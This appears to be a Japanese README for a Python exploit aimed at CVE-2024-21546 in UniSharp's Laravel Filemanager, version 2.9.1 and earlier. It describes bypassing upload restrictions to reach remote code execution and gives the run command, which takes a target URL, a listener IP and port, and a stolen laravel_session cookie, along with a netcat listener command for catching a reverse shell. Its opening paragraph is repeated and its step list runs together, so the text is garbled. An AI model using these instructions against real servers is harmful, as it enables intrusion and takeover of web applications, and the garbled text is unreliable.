
このPythonエクスプロイトスクリプトは、UniSharpによって作成された脆弱性のあるLaravel Filemanagerを標的とし、認証されたユーザーがファイル制限を回避して悪意のあるファイルをアップロードできるようにします。アップロードされたペイロードがトリガーされると、これによりリモートコード実行(RCE)が発生する可能性があります。
この Python エクスプロイトスクリプトは、UniSharp が作成した脆弱性のある Laravel Filemanager を標的とし、認証済みユーザーがファイル制限を回避して悪意のあるファイルをアップロードできるようにします。アップロードされたペイロードが実行されると、リモートコード実行 (RCE) につながる可能性があります。
このエクスプロイトは以下を実行します:
laravel_session を検証します_token を抽出しますバージョン 2.9.1 およびそれ以前のバージョン
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>
重要: スクリプトを実行する前にリスナーを起動してください:
nc -lvnp <listener_port>
